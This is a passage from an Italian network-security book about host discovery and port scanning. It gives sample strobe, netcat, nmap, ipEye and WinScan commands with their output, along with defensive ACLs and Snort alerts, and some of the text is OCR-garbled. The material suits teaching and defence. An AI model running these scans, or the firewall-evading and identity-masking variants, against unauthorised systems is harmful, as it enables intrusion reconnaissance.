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in funzione: questi diventeranno l'oggetto delle successive indagini. In questo 
modo siamo riusciti a ridurre significativamente l’obiettivo, limitando i tempi di ve- 
rifica e circoscrivendo il raggio d’azione. 


D) Contromisure al ping sweep 


Sebbene i ping sweep possano sembrare una perdita di tempo, è importante in- 
dividuare questo tipo di attività. A seconda della politica di protezione adottata, 
potrebbe essere necessario bloccare i ping sweep. Di seguito illustreremo en- 
trambe le opzioni. 


Intercettazione 


Come abbiamo detto, la ricostruzione della mappa di una rete attraverso una serie 
di ping sweep è un metodo valido per perlustrare la rete prima dell’attacco vero e 
proprio. Quindi, riuscire a riconoscere le attività di ping sweep diventa fondamenta- 
le per stabilire quando potrebbe avvenire un attacco e da parte di chi. I metodi prin- 
cipali per l’intercettazione di attacchi di tipo ping sweep sono programmi di IDS 
funzionanti sulla rete, come Snort (http://ww.snort,org/). 

Dal punto di vista dell'host, esistono diverse utility UNIX in grado di riconoscere e 
registrare questo tipo di attacchi. L’intercettazione di sequenze di pacchetti ICMP 
ECHO provenienti da un particolare sistema o da una rete potrebbe indicare che la 
propria rete viene perlustrata. Occorre prestare molta attenzione a questo tipo di at- 
tività, perché potrebbe preludere a un imminente attacco ‘su vasta scala. 

Dal lato Windows, strumenti di intercettazione dei ping basati su host sono difficili da 
trovare; un prodotto shareware/freeware che vale la pena di considerare è Genius, ar- 
rivato alla versione 3.1, disponibile all'indirizzo http://www. indiesoft.com/. Pur 
non riconoscendo scansioni di tipo ICMP ECHO sul sistema, Genius è in grado di 
identificare quelle via TCP. La Tabella 2.1 riporta un elenco di altri strumenti di inter- 
cettazione dei ping che possono contribuire a rafforzare il controllo sul sistema. 


Tabella 2.1 Strumenti UNIX per l'intercettazione di ping su host 


Programma Riferimento 

Scanlogd http://ww.openwall.com/scanlogd 

Courtney 1.3 http://packetstormsecurity.org/UNIX/audit/courtney-1. 
a.tar.Z 

Ippl v 1.4.10 http://pltplp.net/ippl 

Protolog v 1.0.8 http://packetstormsecurity.org/UNIX/loggers/ 


protolog-1.0.8.tar.gz 


Prevenzione 


Riuscire a riconoscere attività di tipo ping sweep è fondamentale, ma è anche neces- 
saria un po’ di prevenzione. Un consiglio certamente valido è valutare attentamente il 
tipo di traffico ICMP consentito sulla rete o in sistemi specifici. Attualmente esistono 
diversi tipi di traffico ICMP: ECHO ed ECHO_RFPLY sono solo due possibilità. Nella 
maggior parte dei casi un sito non necessita di tutti i tipi di traffico ICMP verso tutti i 
sistemi direttamente collegati a Internet. Praticamente qualsiasi firewall è in grado di 
filtrare pacchetti ICMP, ma esigenze interne potrebbero imporre il passaggio di certi 
tipi di messaggi ICMP; in questi casi, valutate attentamente quali tipi ammettere. 
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L'approccio di base consiste nel lasciar passare all’interno solo pacchetti ICMP di 
tipo ECHO_REPLY, HOST UNREACHABLE e TIME EXCEEDED; inoltre, se risulta 
possibile, è consigliabile limitare il traffico a specifici indirizzi IP del vostro ISP ri- 
correndo alle ACL: questo consentirebbe all'ISP di verificare la disponibilità delle 
connessioni, ostacolando al tempo stesso l'esecuzione di sweep ICMP sui sistemi 
collegati direttamente a Internet. ICMP è un potente protocollo per rilevare i proble- 
mi della rete, ma può facilmente essere impiegato per utilizzi impropri. Consenten- 
do il libero passaggio del traffico ICMP attraverso il gateway esterno si lascia aperta 
una porta per attacchi di tipo Denial of Service (rifiuto del servizio, come Smurf). 
Può andare anche peggio. Se riesce a entrare in uno dei vostri sistemi, l’hacker po- 
trebbe creare una backdoor nel sistema operativo e trasmettere dati nascosti all’in- 
terno di pacchetti ICMP_ECHO utilizzando programmi come loki. Per maggiori in- 
formazioni su loki, consigliamo di leggere l'articolo 06 di Pbrack Magazine, Volu- 
me 7, Issue 51, September 01, 1997 (http://phrack.org/show.php?p==51&a=6). 
Un altro strumento interessante, sviluppato da Tom Ptacek e portato in ambiente Li- 
nux da Mike Schiffman, è pingd. Si tratta di un daemon utente che gestisce tutto il 
traffico ICMP_ECHO e ICMP_ECHOREPLY a livello di host. Per ottenere questo ri- 
sultato è stato necessario eliminare dal kernel il supporto per l'elaborazione di 
ICMP_ECHO e implementare un daemon utente che utilizza un socket ICMP per ge- 
stire i pacchetti. Sostanzialmente si ottiene un meccanismo per il controllo degli ac- 
cessi via ping a livello di sistema. pingd è disponibile anche per Linux (http: // 
packetstormsecurity.org/UNIX/misc/pingd-0.5.1.tgz). 


Interrogazioni ICMP 


Diffusione: 2 
Semplicità: 9 
Impatto: so] 
Fattore di rischio: 9: 


I ping sweep (o i pacchetti ICMP ECHO) non sono che la punta dell'iceberg delle in- 
formazioni ottenibili via ICMP su una rete. È sufficiente il semplice invio di un pac- 
chetto ICMP per raccogliere preziose informazioni su un sistema. Con gli strumenti 
icmpquery (http://packetstormsecurity.org/UNIX/scanners/icmpquery.c) op- 
pure icmpush (http://packetstormsecurity.org/UNIX/scanners/icmpush22.tgz) 
di UNIX si può richiedere l’ora del sistema (per verificare in che fuso orario si trovi) in- 
viando un messaggio ICMP di tipo 13 (TIMESTAMP), Allo stesso modo, per ottenere la 
netmask di un dispositivo specifico è sufficiente utilizzare un messaggio ICMP di tipo 
17 (ADDRESS MASK REQUEST). 

La netmask di una scheda di rete è importante, poiché consente di identificare tutte 
le sottoreti utilizzate. Conoscendo le sottoreti, si riescono a concentrare gli attacchi 
su una specifica porzione della rete, evitando accuratamente gli indirizzi broadcast, 
per esempio. Icmpquery prevede due opzioni per la richiesta di data/ora e per 
quella dell’address mask: 


icmpquery <-query> [-B] [-f fromhost] [-d delay] [-T time] targets 
where <query> is one of: 
-t : icmp timestamp request (default) 
-m : icmp address mask request 
The delay is in microseconds to sleep between packets. 
targets is a list of hostnames or addresses 
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-T specifies the number of seconds to wait for a host to 
respond. The default is 5. 

-B specifies 'broadcast' mode. icmpquery will wait 
for timeout seconds and print all responses. 

If you're on a modem, you may wish to use a larger -d and -T 


Il comando seguente consente di richiedere l’ora impostata su un router: 


[tsunami] icmpquery -t 192.168.1.1 
192.168.1.1 1 19:86:19 


In questo caso, icmpquery richiede la netmask al router: 


{tsunami] icmpquery -m 192.168.1.1 
192.168.1.1 : @®xFFFFFFEO 


Non tutti i router o sistemi consentono risposte ai messaggi ICPM TIMESTAMP o 
NETMASK, quindi i risultati ottenibili con icpmquery e icpmpush possono variare 
notevolmente da un host all’altro. 


© Contromisure alle interrogazioni ICMP 


Una delle contromisure consigliate consiste nel bloccare sui router esterni i tipi di 
messaggi ICMP che forniscono informazioni. Come minimo, sarebbe necessario im- 
pedire ai pacchetti di richiesta TIMESTAMP (ICMP tipo :13) e ADDRESS MASK 
(ICMP tipo 17) di entrare nella rete. Se sulla linea di confine disponete alcuni router 
Cisco, potete impedire che rispondano a questi pacchetti di richiesta ICMP utiliz- 
zando le seguenti ACL: 


access-list 101 deny icmp any any 13 ! timestamp request 
access-list 101 deny icmp any any 17 ! address mask request 


È possibile riconoscere questa attività utilizzando un sistema di intercettazione delle 
intrusioni per reti (NIDS) come Snort (ww. snort.org). Di seguito viene indicato 
un frammento di questo tipo di attività segnalata da Snort: 


[**] PING-ICMP Timestamp [**] 
05/29-12:04:40.535502 192.168.1.10 -> 192.168.1.1 
ICMP TTL:255 TOS:0x0 ID:4321 

TIMESTAMP REQUEST 


Determinazione dei servizi 
in funzione o in ascolto 


Finora abbiamo identificato i sistemi effettivamente attivi (utilizzando ping sweep 
sia su ICMP sia su TCP) e raccolto qualche informazione via ICMP. A questo punto 
siamo pronti per procedere alla scansione delle porte su ogni sistema. 
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Scansione delle porte 


Diffusione: 10 
Semplicità: i, 
Impatto: 2 
Fattore cli rischio: 9 


La scansione delle porte (por? scannirg) consiste nella connessione alle porte TCP 
e UDP presenti sul sistema scelto come obiettivo per stabilire quali servizi siano in 
esecuzione o in stato LISTENING, ovvero in ascolto. L’identificazione delle porte in 
ascolto è fondamentale per risalire al tipo di sistema operativo e alle applicazioni in 
uso. Eventuali servizi attivi in ascolto potrebbero consentire a utenti non autorizzati 
di accedere a sistemi configurati in modo errato o su cui sia in esecuzione un soft 
ware con problemi di sicurezza noti. 

In questo paragrafo ci soffermeremo su alcuni degli strumenti di scansione delle 
porte più diffusi, in grado di fornire diverse informazioni preziose. Le tecniche che 
incontreremo saranno differenti da quelle viste fino a questo punto, poiché il nostro 
obiettivo in precedenza era semplicemente il riconoscimento dei sistemi attivi. Nelle 
fasi successive daremo per scontato che il sistema sia in funzione e punteremo a 
identificare tutte le porte in ascolto e i potenziali punti di accesso. 

Gli obiettivi che ci poniamo con la scansione delle porte sono diversi. Tra questi ri- 
cordiamo: 


e l'identificazione dei servizi TCP e UDP in esecuzione sul sistema obiettivo; 

e l’identificazione del tipo di sistema operativo; 

e l’identificazione di particolari applicazioni o di versioni di uno specifico 
servizio. 


Tipi di scansione 


Prima di passare agli indispensabili strumenti per la scansione delle porte, è neces- 
sario chiarire quali siano le diverse tecniche disponibili. Uno dei pionieri nell'imple- 
mentazione di queste tecniche di scansione è Fyodor, che ne ha implementate un 
buon numero nel suo nmap. Molti dei tipi di scansione che presenteremo in questo 
paragrafo sono stati elaborati direttamente dallo stesso Fyodor. 


e TCP connect scan (scansione TCP con connessione). Questo tipo di 
scansione si collega alla porta obiettivo e completa una procedura di hand- 
shake a tre fasi (three-way handshake), SYN, SYN/ACK e ACK (Figura 2.2). 
È facilmente intercettata dal sistema obiettivo. 


e TCP SYNscan (scansione TCP via SYN). Questa tecnica è detta anche di 
scansione semiaperta (halfopen scanning), poiché non viene realizzata 
una connessione TCP completa. Piuttosto, viene inviato un pacchetto SYN 
alla porta obiettivo e si attende la risposta. Se si riceve un pacchetto 
SYN/ACK, questo indica che la porta è in stato LISTENING; se la risposta è 
RST/ACK, questo normalmente significa che la porta non è in ascolto, Il si- 
stema che esegue la scansione risponde con RST/ACK, in modo tale che la 
connessione non venga mai completata. Questa tecnica presenta il vantag- 
gio di essere più discreta rispetto alla connessione TCP completa e potreb- 
be non essere registrata sul sistema target. 
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Handshake TCP in tre fasi 


1) Invio di SYN da parte del client 


2) Invio di SYN/ACK da parte del server 


3) Invio di ACK da parte del client 


Server 


Figura 2.2 
1) Invio di un pacchetto SYN; 2) Ricezione di un pacchetto SYN/ACK; 3) Invio di un pacchetto ACK. 


TCP FIN scan (scansione TCP via FIN). Questa tecnica prevede l’invio di 
un pacchetto FIN sulla porta obiettivo. Secondo la RFC 793 (http:// 
ww.ietf.org/rfc/rfc0793.txt), il sistema target dovrebbe rispondere 
con RST per tutte le porte chiuse. Solitamente questa tecnica funziona solo 
con le implementazioni UNIX di TCP/IP. 


TCP Xmas Tree scan (scansione TCP ad albero di Natale). Questa tecni- 
ca prevede l’invio di un pacchetto FIN, URG e PUSH alla porta target. Se- 
condo la RFC 793, il sistema obiettivo dovrebbe rispondere con RST per tut- 
te le porte chiuse. 


TCP Null scan (scansione 1TP mulia). Questa retti Vssttirva etto Ing. 
Secondo la RFC 793, il sistema obiettivo dovrebbe rispondere con RST per 
tutte le porte chiuse. 


TCP ACK scan (scansione TCP via ACK). Questa tecnica viene utilizza- 
ta per ricostruire la mappa dell'insieme di regole del firewall. Può risulta- 
re utile per determinare se il firewall è un semplice filtro dei pacchetti 
che consente solo connessioni riconosciute (ovvero, connessioni con im- 
postato il bit ACK) o un firewall che esegue funzionalità avanzate di fil- 
traggio dei pacchetti. 

TCP Windows scan (scansione TCP con Windows). Questa tecnica è in 
grado di riconoscere sia porte aperte sia porte filtrate/non filtrate su alcuni 
sistemi (per esempio, AIX e FreeBSD) a causa di un'anomalia nel modo in 
cui viene restituita la dimensione della finestra TCP. 


TCP RPC scan (scansione TCP via RPC). Questa tecnica è specifica dei si- 
stemi UNIX e viene utilizzata per riconoscere e identificare porte RPC (Re- 
mote Procedure Call) unitamente al loro programma e numero di versione. 


UDP scan (scansione UDP). Questa tecnica prevede l'invio di un pacchet- 
to UDP alla porta target. Se la risposta è un messaggio “ICMP port unrea- 
chable”, la porta è chiusa. Se invece non si riceve tale messaggio, si può 
concludere che la porta è aperta. Essendo UDP un protocollo “connection- 
less”, cioè non basato sulla connessione, la precisione di questa tecnica di- 
pende fortemente da numerosi fattori legati al livello di utilizzo delle risorse 
della rete e di sistema. Inoltre, la scansione UDP è un processo estrema- 
mente lento, specialmente nel caso si tenti di esaminare un dispositivo che 
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utilizzi intensamente i filtri sui pacchetti. Se decidete di eseguire scansioni 
UDP su Internet, non aspettatevi risultati affidabili. 
Alcune implementazioni di IP presentano la spiacevole caratteristica di restituire 
RST per tutte le porte, che siano in ascolto o meno. Di conseguenza, il risultato del- 
la scansione potrebbe non essere quello previsto; tuttavia, le scansioni SYN e con- 
nect( ) dovrebbero funzionare su tutti gli host. 


Identificazione dei servizi TCP e UDP in esecuzione 


Disporre di un buon strumento per la scansione delle porte è un elemento fondamen- 
tale nel processo di footprinting. Esistono numerosi programmi di questo genere, sia 
per UNIX sia per NT, ma ci limiteremo a citare alcuni dei più popolari e collaudati. 


strobe 


strobe è un venerando strumento di scansione delle porte TCP, sviluppato da Ju- 
lian Assange (ftp://ftp.FreeBSD.org/pub/FreeBsD/ports/distfiles/strobe- 
1.06.tgz). Esiste da qualche anno ed è uno dei programmi più veloci e affidabili 
per scansioni TCP. Tra le funzionalità principali di strobe ricordiamo la possibilità 
di ottimizzare l’utilizzo delle risorse di sistema e di rete per effettuare la scansione 
del sistema target in modo efficiente, Efficienza a parte, le versioni di strobe a par- 
tire dalla 1.04 sono in grado di catturare, se disponibile, il banner associato a ogni 
porta alla quale si connettono. Questo può consentire l’identificazione del sistema 
operativo e del servizio in esecuzione. Per maggiori informazioni sulla cattura dei 
banner si veda il Capitolo 3. 

L'output di strobe riporta l'elenco di tutte le porte TCP in ascolto: 


[tsunami] strobe 192.168.1.10 
strobe 1.03 © 1995 Julian Assange (proff@suburbia.net). 


192.168.1.10 echo 7/tcp Echo [95,JBP] 

192.168.1.10 discard 9/tcp Discard [94,JBP] 

192.168.1.10 sunrpe 111/tcp rpcbind SUN RPC 

192.168.1.10 daytime 13/tcp Daytime [93,JBP] 

192.168.1.10 chargen 19/tcp ttytst source 

192.168.1.10 ftp 21/tcp File Transfer [Control] [96,UBP] 
192.168.1.10 exec 512/tcp remote process execution; 
192.168.1.10 login 513/tcp remote login a la telnet; 
192.168.1.10 cmd 514/tcp shell like exec, but automatic 
192.168.1.10 ssh 22/tcp Secure Shell 

192.168.1.10 telnet 23/tcp Telnet [112,JBP] 

192.168.1.10 smtp 25/tcp Simple Mail Transfer [102,JBP] 
192,168.1.10 nfs 2049/tcp networked file system 
192.168.1.10 lockd 4045/tcp 

192.168.1.10 unknown 32772/tcp unassigned 

192.168.1.10 unknown 32773/tcp unassigned 

192.168.1.10 unknown 32778/tcp unassigned 

192.168.1.10 unknown 32799/tcp unassigned 

192.168.1.10 unknown 32804/tcp unassigned 


Pur essendo estremamente affidabile, strobe presenta alcuni limiti che è bene tene- 
re presente. Innanzitutto, si tratta di uno scanner TCP e non prevede funzionalità di 
scansione UDP: in pratica presenta solo una parte del quadro del sistema. Per supe- 
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rare queste limitazioni e utilizzare altre tecniche, è necessario cercare più a fondo 
nel nostro arsenale. 


udp_scan 


Poiché strobe è limitato alla scansione TCP, possiamo servirci di udp_scan, inizial- 
mente compreso nel kit SATAN (Security Administrator Tool for Analyzing Networks) 
e sviluppato nel 1995 da Dan Farmer e Wietse Venema. Mentre SATAN risulta piutto- 
sto datato, alcuni dei suoi strumenti funzionano ancora egregiamente. Inoltre, nuove 
versioni di SATAN (che ora si chiama SAINT) sono state rilasciate sul sito http:// 
wwdsilx.wwdsi.com. Sono disponibili anche altri strumenti per effettuare scansioni 
UDP, ma a nostro modesto parere udp_scan è uno dei più affidabili. Occorre anche 
sottolineare che, pur essendo affidabile, udp_scan presenta un antipatico effetto col- 
laterale: i principali prodotti di IDS lo riconoscono e segnalano le attività di scansione 
da parte di SATAN. In altre parole, non è uno degli strumenti più discreti disponibili. 
Tipicamente, rivolgeremo la nostra attenzione alle porte “well-known”, cioè quelle 
sotto la 1024, e a particolari porte ad alto rischio al di sopra della 1024: 


[tsunami] udp_scan 192.168.1.1 1-1024 
42: UNKNOWN : 
53: UNKNOWN: 
123:UNKNOWN: 
135: UNKNOWN: 


netcat 


Un'altra eccellente utility è netcat, o nc, che viene sviluppata da Hobbit 
(hobbit@avian.org). Questo programma offre un numero così elevato di funziona- 
lità da indurci a considerarlo “il coltellino svizzero nel nostro arsenale per la sicu- 
rezza”. Torneremo a parlare di molte delle caratteristiche più avanzate di netcat 
nel prosieguo del libro; per ora è sufficiente segnalare che nc offre funzionalità di 
base per la scansione di porte TCP e UDP. I parametri -v e -vv controllano il livello 
di dettaglio dell'output, rispettivamente elevato (verbose) e molto elevato (very ver 
bose). Il parametro -z attiva l’I/O a modalità zero, utilizzato per la scansione delle 
porte, mentre il parametro -w2 definisce un intervallo di durata per ogni connessio- 
ne. Poiché di default nc si serve delle porte TCP, è necessario specificare il parame- 
tro -u per la scansione UDP (come nel secondo esempio): 


[tsunami] nc -v -z -w2 192.168.1.1 1-140 


[192.168.1.1] 139 (?) open 
[192.168.1.1] 135 (?) open 
[192.168.1.1] 112 (pop-3) open 
[192.168.1.1] 196 (?) open 
[192.168.1.1] 81 (?) open 
[192.168.1.1] 89 (http) open 
[192.168.1.1] 79 (finger) open 
[192.168.1.1] 53 (domain) open 
[192.168.1.1] 42 (?) open 
[192.168.1.1] 25 (smtp) open 
[192.168.1.1] 21 (ftp) open 


[tsunami] nc -u -v -z -w2 192.168.1.1 1-140 
[192.168.1.1] 135 (ntportmap) open 
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TCP comunicando sulla porta 113. Molte versioni di ident in realtà rispondono con 
il proprietario del processo legato alla porta in esame; tuttavia, si tratta di una possi- 
bilità da tenere in considerazione nel caso di obiettivi UNIX: 


[tsunami] nmap -I 192.168.1.10 
Starting nmap V. 2.53 by fyodor@insecure.org 


Port State Protocol Service Owner 
22 open top ssh root 
25 open tcp smtp root 
80 open tcp http root 
110 open top pop-3 root 
113 open top auth root 
6000 open tcp X11 root 


Osservate come in questo esempio sia possibile stabilire il proprietario effettivo di 
ogni processo. I lettori più attenti avranno notato anche che il server Web è in ese- 
cuzione come root, invece che come utente senza privilegi (per esempio “nobo- 
dy”): si tratta di una pratica non del tutto sicura. Da questa scansione di tipo ident 
abbiamo quindi ricavato un'informazione preziosissima. Se si riuscisse a manomet- 
tere il servizio HTTP in modo da consentire a un utente non autorizzato di eseguire 
comandi, il premio sarebbe l’accesso immediato come root. 

L'ultima tecnica di scansione che presentiamo è detta FYP bounce scanning 
(scansione con rimbalzo FTP), esposta per la prima volta da Hobbit in un in- 
tervento del 1995 su Bugtraq (http://www.securityfocus.com/templates/ 
archive.pike?list=1&msg=199507120620.CAA18176@narg.avian.org), in cui 
sottolineava alcuni difetti intrinseci del protocollo FTP (RFC 959, all'indirizzo 
http://www.ietf.org/rfc/rfc0959.txt). Sostanzialmente, un attacco di tipo 
FTP bounce è un metodo insidioso per “ripulire” le connessioni attraverso un 
server FTP, abusando del supporto a connessioni FTP “proxy”. Come evidenziato 
da Hobbit nell'articolo citato, attacchi di questo tipo “possono essere utilizzati 
per inviare posta e messaggi virtualmente non rintracciabili, intasare i server di 
diversi siti, riempire i dischi, cercare di saltare firewall e, in generale, dare fasti- 
dio ed essere difficili da rintracciare allo stesso tempo”. Tra l’altro, è possibile far 
rimbalzare le scansioni delle porte da un server FTP per nascondere la propria 
identità, o meglio ancora superare certi meccanismi di controllo. 

Ovviamente, nmap supporta anche questo tipo di scansione, tramite l'opzione -b; 
tuttavia devono essere rispettate alcune condizioni. In primo luogo, il server FTP 
deve contenere una directory in lettura e scrittura come /incoming; inoltre, deve 
accettare da nmap indicazioni false sulle porte, attraverso il comando PORT. Questa 
tecnica può risultare estremamente efficace per superare i dispositivi di controllo 
degli accessi e mascherare la propria identità, ma è anche molto lenta, Inoltre, mol- 
te versioni recenti dei server FTP non consentono questo tipo di attività nefasta. 
Ora che abbiamo presentato gli strumenti indispensabili per eseguire la scansione 
delle porte, è necessario comprendere come analizzare i dati raccolti da ogni pro- 
gramma, Indipendentemente dallo strumento utilizzato, stiamo cercando di identifi- 
care le porte aperte che potrebbero svelare indizi sul tipo di sistema operativo. Per 
esempio, se le porte 139 e 135 sono aperte, con ogni probabilità il sistema operativo 
del nostro obiettivo è Windows NT; infatti, Windows NT normalmente ascolta su 
entrambe le porte, mentre Windows 95/98 utilizza solo la 139. 

Riprendendo l’output di strobe (visto in precedenza), possiamo notare molti dei 
servizi in esecuzione sul sistema. Dovendo formulare un'ipotesi, potremmo dire che 
il sistema sembra utilizzare una variante di UNIX. Siamo arrivati a questa conclusio- 
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ne perché il portmapper (111), le porte dei servizi Berkeley R (512-514), NFS (2049) 
e le porte con numeri 3277X e oltre sono tutte in ascolto. L'esistenza di queste porte 
è normalmente un indicatore del fatto che il sistema utilizza UNIX. Inoltre, dovendo 
risalire alla specifica variante di UNIX, potremmo ipotizzare Solaris. Sappiamo che 
normalmente Solaris esegue i propri servizi RPC nell'intervallo 3277X. Ricordate che 
stiamo solo formulando ipotesi e che il sistema operativo potrebbe in realtà essere 
completamente diverso. 

Con semplici scansioni sulle porte TCP e UDP, siamo in grado di valutare a grandi 
linee il livello di esposizione dei sistemi in esame. Per esempio, se la porta 139 è 
aperta su un server Windows NT, questo potrebbe essere estremamente vulnerabi- 
le. Il Capitolo 5 espone i punti deboli intrinseci di Windows NT e descrive come sia 
possibile accedere alla porta 139 per manomettere la sicurezza su sistemi che non 
predispongano misure di protezione adeguate su questa porta. Nel nostro esempio, 
anche il sistema UNIX sembra essere esposto al rischio, perché i servizi in ascolto 
forniscono numerose funzionalità e risentono di ben noti problemi legati alla sicu- 
rezza. Per esempio, i servizi RPC (Remote Procedure Call) e il servizio NFS (Network 
File System) sono due delle occasioni principali per un hacker di manomettere la si- 
curezza di un server UNIX (Capitolo 7). Al contrario, è praticamente impossibile 
manomettere la sicurezza di un servizio remoto se questo non è in ascolto. Quindi è 
importante ricordare che maggiore è il numero dei servizi in esecuzione su una 
macchina, più elevata sarà la probabilità di una manomissione del sistema. 


Strumenti di scansione 
delle porte basati su Windows 


Abbiamo finora parlato a lungo di strumenti di scansione delle porte dal punto di 
vista di un utente UNIX: questo significa forse che gli utenti Windows non possono 
unirsi alla festa? Naturalmente no. Gli strumenti di scansione riportati di seguito 
sono saliti alla ribalta del nostro arsenale personale per la loro velocità, precisione e 
funzionalità disponibili. 


NetScanTools Pro 2000 


Uno degli strumenti di analisi delle reti più versatili attualmente in circolazione, Net- 
ScanTools Pro 2000 (NSTP2K), offre praticamente qualsiasi utilità immaginabile sot- 
to un’unica interfaccia: interrogazioni DNS tra cui nslookup e dig con axfr, whois, 
ping sweep, scansioni della tabella dei nomi NetBIOS, SNMP walk e molto altro. 
Inoltre, dispone della funzionalità multitasking che consente, per esempio, di ese- 
guire una scansione delle porte di una rete mentre si esegue il ping sweep di un’al- 
tra (sebbene vi sconsigliamo di effettuare tale operazione su reti di grandi dimensio- 
ni, a meno che non siate estremamente pazienti). 

Tra le altre cose comprende uno dei migliori strumenti per la scansione delle porte 
in Windows disponibili sul mercato: Port Probe. Tra i punti forti di Port Probe ricor- 
diamo: la possibilità di specificare target e porte in modo flessibile (sia l'IP target sia 
gli elenchi delle porte possono essere importati da file di testo), il supporto per le 
scansioni TCP e UDP (sebbene non sistematicamente per porta) e velocità multi- 
thread. Come aspetto negativo possiamo segnalare che l’uscita prodotta da Port 
Probe non è facilmente analizzabile utilizzando gli script o gli strumenti di elabora- 
zione dei dati disponibili e che la sua natura grafica rende di fatto impossibile la sua 
inclusione all’interno degli script. Sarebbe anche opportuno che l’uscita di una fun- 
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zione (per esempio, NetScanner) possa essere utilizzata come ingresso di un'altra 
(per esempio, Port Probe). 

In generale, NSTP2K (http: //ww.nwpsw.com) è un prodotto professionale periodi- 
camente aggiornato per mezzo di serviced pack, ma rimane costoso se confrontato 
con altri prodotti concorrenti. Una versione meno potente chiamata Netscan Tools 
(attualmente rilasciata come versione 4) è disponibile in prova per trenta giorni ma 
non è nemmeno paragonabile all'insieme delle funzionalità disponibili in Pro 2000 
(per esempio, non supporta le scansioni UDP). 

Quando utilizzate NSTP2K, ricordate di disabilitare il server ident nella scheda 
IDENT Server in modo da non ritrovarvi ad ascoltare la porta TCP 113 ogniqualvolta 
eseguite una scansione. La Figura 2.3 mostra NSTP2K in azione durante la scansio- 
ne di un intervallo di indirizzi di una rete di medie dimensioni. 
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> Servei Lookup | HyperTians: | Finger | Ping. | Traceroute | Whois | SNMP | Detection 
Server Database Tests: |. Launcher WinSock Info | 


| 


nl unconfirmed, no packets received from t 
-@ 00080 - TCP - http 

I .® 00500 - tmp - sytek - unconfirmed, no packets received from t _EgPotLia | 
E BA 192.168, 234.2 cl È (Dlear esule | 
È A 192.168.234.3 il 

|. 00001 - UDP - unknown - unconfirmed, no packets received from _Merge Dillon | 
® 00002 - UDP - unknown - unconfirmed, no packets received from i | Probe Delay [ms) 
® 00003 - UDP - unknowm - unconfirmed, no packets received from Pa 

- UDP - unknowm - unconfirmed, no packets received from 

ss I packets re eived cron 


Figura 2.3 


NetScanTools Pro 2000 è uno dei programmi più veloci e flessibili oggi disponibili per la scansione 
delle porte di rete Windows. 


SuperScan 


SuperScan, prodotto da Foundstone, è un altro programma di scansione di porte 
TCP veloce e versatile che è possibile scaricare gratuitamente all'indirizzo http: // 
ww.foundstone.com/rdlabs/termsofuse.php?filename=superscan.exe. Analo- 
gamente a NSTP2K, consente di analizzare in modo flessibile indirizzi IP ed elenchi 
di porte. L'opzione Extract from file risulta particolarmente utile (Figura 2.4), Per 
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una descrizione completa, consultate la guida in linea, della quale riportiamo un 
estratto di seguito affinché possiate rendervi conto della quantità di tempo che que- 
sta opzione consente di risparmiare. 
“La funzionalità Extract from file esegue la scansione di un qualsiasi file di 
testo ed estrae indirizzi IP validi e nomi di host. Il programma si comporta 
molto bene quando incontra nomi di host validi, ma potrebbe essere neces- 
sario rimuovere in anticipo il testo non necessario utilizzando un editor 
esterno, Potete fare clic su Browse and Extract il numero di volte desiderato 
utilizzando file differenti: il programma aggiungerà i nuovi nomi di host 
all'elenco. Tutti gli elementi duplicati verranno rimossi automaticamente. 
Dopo aver trovato tutti i nomi di host e in previsione della successiva scan- 
sione delle porte, potete convertire i nomi di host in indirizzi IP facendo clic 
sul pulsante Resolve.” 
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Figura 2.4 


L'opzione Extract from file di SuperScan è molto utile: è sufficiente scegliere un file di testo, contenente 
tutti gli indirizzi IP e gli identificativi degli host, creato appositamente per la scansione delle porte. 
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Questa procedura è illustrata nella Figura 2.4, SuperScan è inoltre dotato di uno de- 
gli elenchi di porte più completi; in aggiunta, è possibile selezionare e deseleziona- 
re manualmente le porte, per consentire un controllo più accurato. SuperScan è, in- 
fine, davvero veloce. 


WinScan 


WinScan, realizzato da Sean Mathias di Prosolve (http://ww.prosolve.com), è un 
programma di scansione delle porte TCP disponibile gratuitamente sia in versione 
grafica (winscan.exe) sia per riga di comando (scan. exe). La versione per riga di 
comando viene abitualmente utilizzata negli script per la sua capacità di sondare 
reti di Classe C e la semplicità di analisi dell'output. Utilizzando la versione Win32 
dei programmi di utilità strings, tee e tr forniti da Mortice Kern Systems Inc. 
(all’indirizzo http://ww.mks.com), i comandi di console NT riportati di seguito 
consentono di effettuare la scansione di una rete per tutte le porte well known com- 
prese tra 0 e 1023 e di visualizzare i risultati sotto forma di coppie indirizzo_IP: 
nome_servizio:port_# in colonne separate da virgola: 


scan.exe -n 192.168.7.0 -s 0 -e 1023 -f | strings | findstr /c:"/tcp" | 
tr \011\040 : | tr -s : : | tee -ia results.txt 


Non utilizzate il parametro -f di scan. exe su collegamenti lenti in quanto i risultati 
non sono affidabili. I risultati del nostro script avranno l’aspetto seguente: 


192.168.22.5:nbsession:139/tcp 
192.168.22.16:nbsession:139/tcp 
192.168.22.32:nbsession:139/tcp 


Un sentito ringraziamento a Patrick Heim e Jason Glassberg per questo listato. 


ipEye 


Pensate di dover necessariamente utilizzare Linux e nmap per eseguire esotiche 
scansioni di pacchetti? Ripensateci. ipEye di Arne Vidstrom, disponibile all'indirizzo 
http://ntsecurity.nu, consente di eseguire scansioni di porte di origine nonché 
scansioni SYN, FIN e Xmas dalla riga di comando di Windows. Le uniche limitazioni 
a questo programma piuttosto interessante risiedono nel fatto che può essere ese- 
guito unicamente su sistemi Win 2000 e che esegue la scansione di un solo host per 
volta. Di seguito viene riportato un esempio di ipEye che esegue una scansione 
SYN originata sulla porta TCP 20 nel tentativo di evadere le regole di filtro di un 
router, simile in tutto e per tutto all’opzione -g di nmap (modificato per motivi di im- 
paginazione): 


C:\Toolbox>ipeye.exe 192.168.234.110 -syn -p 1 1023 -sp 20 


ipeye 1.1 - (c) 2000, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) 
- http://ntsecurity.nu/toolbox/ipeye/ 


1-52 [closed or reject] 
53 [open] 

54-87 [closed or reject] 
88 [open] 

89-134 [closed or reject] 
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135 [open] 
136-138 [closed or reject] 
139 [open] 


636 [open] 
637-1023 [closed or reject] 
1024-65535 [not scanned] 


Poiché le ACL di molti router e firewall sono configurate per consentire a protocolli 
come DNS (UDP 53), il canale di dati FTP (TCP 20), SMTP (TCP 25) e HTTP (TCP 
80) l'ingresso attraverso i filtri, la scansione delle porte di origine può potenzial- 
mente evadere questo tipo di controllo facendosi passare come traffico in ingresso 
di questo tipo. Tuttavia, è necessario conoscere lo spazio di indirizzamento protetto 
dal firewall o dal router, operazione spesso complessa se è coinvolto NAT (NetBIOS 
Auditing Tool). 


WUPS 


WUPS (Windows UDP Port Scanner) è stato realizzato dallo stesso autore che ha 
creato http://ntsecurity.nu (Arne Vidstrom). Si tratta di un programma di scan- 
